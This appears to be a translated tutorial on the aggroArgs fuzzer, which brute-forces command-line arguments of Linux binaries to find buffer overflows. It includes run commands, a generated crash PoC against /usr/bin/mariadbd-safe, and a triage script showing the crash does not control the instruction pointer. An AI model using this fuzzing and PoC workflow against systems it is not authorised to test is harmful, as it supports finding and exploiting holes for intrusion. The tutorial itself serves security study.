AggroArgs - Brute force command line buffer overflow and automated exploit generation, linux, aggressive arguments
Let's pay attention to addr2line and EIP. In the line marked WARNING we can see the segfault error message (segmentation fault).
We are offered several execution modes for the utility. We will use verbose mode (detailed output); you also need to specify a folder with binaries (executable files such as ELF and others). The --blacklist= flag excludes the files you specify from the scan; the default is DEFAULT='*.so,*.so.*,dmesg,script,suspend,init,runlevel,reboot,shutdown,switchoff,*grep'. First clone the tool and show its help:
Code:
git clone https://github.com/tintinweb/aggroArgs && cd ~/aggroArgs/release && python2 aggroArgs.zip -h
Then run it against the directory, writing everything to a file:
Code:
python2 aggroArgs.zip --verbosity=10 --blacklist=*.so,*.so.*,reboot,shutdown,runlevel,init,script,rm /usr/bin > output.txt
Also, if you want a quick result, you can pipe all the output through the grep utility; it will look like this:
We have to wait some time until the brute force is over. It is also better to use the --output-pos=./pos flag to write the test results there. After the brute force we get the result; look at output.txt:
Code:
python2 aggroArgs.zip --verbosity=10 --blacklist=*.so,*.so.*,reboot,shutdown,runlevel,init,script,rm /usr/bin 2>&1 | grep -E 'segfault|error'
When viewing the output, pay attention to the WARNING entries: they show you the Addr2Line and DEEP_analysis results. The tool itself will generate a PoC for you from the address offset and the EIP/stack information, along with the pattern.
At the end of the scan there are some statistics, from which we can see that we have 10+ binaries and an exploit was written for them, namely its body; it works in conjunction with the tool itself:
Python:
#! /usr/bin/env python
'''
loglines == segfault at 7ffeb3380000 ip 00007f834f556ad9 sp 00007ffeb337df18 error 6 in libc.so.6[7f834f428000+16e000]
addr2line == ['addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd', 'addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd']
EIP == {'ip': '00007f834f556ad9', 'sp': '00007ffeb337df18', 'at': '7ffeb3380000', 'eip_ascii_real': '\x00\x008\xb3\xfe\x7f', 'eip_ascii': '\x7f\xfe\xb38\x00\x00'}
'''
# addr2line could not symbolize the crash address: the escaped bytes above are its
# Russian-locale message "file format not recognized", because mariadbd-safe is a
# shell wrapper script rather than an ELF binary. 'eip_ascii_real' is the fault
# address 'at' as little-endian bytes, 'eip_ascii' the same value big-endian.
from __future__ import print_function
import os
import subprocess

# Target and argument vector that crashed during the aggroArgs run; the second
# argument is the cyclic pattern (elided here, as in the original PoC).
CMD = '/usr/bin/mariadbd-safe'
ARGS = ['-r', 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A...etc pattern']

if __name__ == '__main__':
    os.system('clear')  # the generated PoC called an undefined clear(); this is the intended screen clear
    print("Target: %s" % CMD)
    print("[ ] executing, please stand by ...")
    ret = subprocess.Popen([CMD] + ARGS, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    ret.communicate()  # wait for the child; a segfault shows up as returncode -11 (SIGSEGV)
    print("[*] done! exit status: %r" % ret.returncode)
Now we will construct a separate exploit ourselves from the data the fuzzer gave us. As the target I'll take the file /usr/bin/mariadbd-safe (aka mysql) that I came across. Let's see what aggroArgs found:
Code:
segfault at 7ffead978000 ip 00007f26a6357b59 sp 00007ffead974d08 error 6 in libc.so.6[7f26a6228000+170000]
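Before treating a WARNING as a finding, the check a practitioner wants is whether the cyclic pattern actually reached the instruction pointer or the faulting address. The following is an added example, not code from the post or from aggroArgs: it parses the kernel segfault line quoted above, decodes the x86 error code, and searches the pattern for the crash values. The field names and the pattern generator are my assumptions.

```python
import re
from itertools import islice
from string import ascii_lowercase, ascii_uppercase, digits

# Layout of the kernel "segfault at ... ip ... sp ... error N in lib[base+size]"
# line quoted on the page; the field names and the pattern generator are my assumptions.
SEGFAULT_RE = re.compile(
    r"segfault at (?P<at>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) "
    r"error (?P<error>\d+) in (?P<module>\S+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]")

def parse_segfault(line):
    """Split one kernel segfault line into integer fields; None if it does not match."""
    m = SEGFAULT_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    return {"at": int(d["at"], 16), "ip": int(d["ip"], 16), "sp": int(d["sp"], 16), "error": int(d["error"]),
            "module": d["module"], "base": int(d["base"], 16), "size": int(d["size"], 16)}

def describe_error(code):
    """x86 page-fault error code: bit0 = protection violation (0 = page not present), bit1 = write, bit2 = user mode."""
    return {"present": bool(code & 1), "write": bool(code & 2), "user": bool(code & 4)}

def cyclic_pattern(length):
    """Metasploit-style Aa0Aa1Aa2... pattern, the shape aggroArgs passes in ARGS."""
    triads = (u + l + d for u in ascii_uppercase for l in ascii_lowercase for d in digits)
    return "".join(islice(triads, length // 3 + 1))[:length]

def pattern_offset(pattern, value, width=8):
    """Offset of value's little-endian bytes (trailing NULs dropped) inside pattern, or None."""
    needle = value.to_bytes(width, "little").rstrip(b"\x00")
    if len(needle) < 4:  # too few bytes to be a meaningful match
        return None
    idx = pattern.encode("ascii").find(needle)
    return None if idx < 0 else idx

def triage(line, pattern):
    """Where ip is, the access type, and whether the pattern reached ip or the faulting address."""
    crash = parse_segfault(line)
    if crash is None:
        return None
    in_module = crash["base"] <= crash["ip"] < crash["base"] + crash["size"]
    return {"module": crash["module"],
            "ip_module_offset": crash["ip"] - crash["base"] if in_module else None,
            "access": "write" if describe_error(crash["error"])["write"] else "read",
            "ip_pattern_offset": pattern_offset(pattern, crash["ip"]),
            "fault_addr_pattern_offset": pattern_offset(pattern, crash["at"])}
```

For the page's own line both pattern offsets come back None: libc performed a user-mode write to a not-present, page-aligned address just above sp, so the WARNING shows a write past a buffer, not that the pattern controls the instruction pointer.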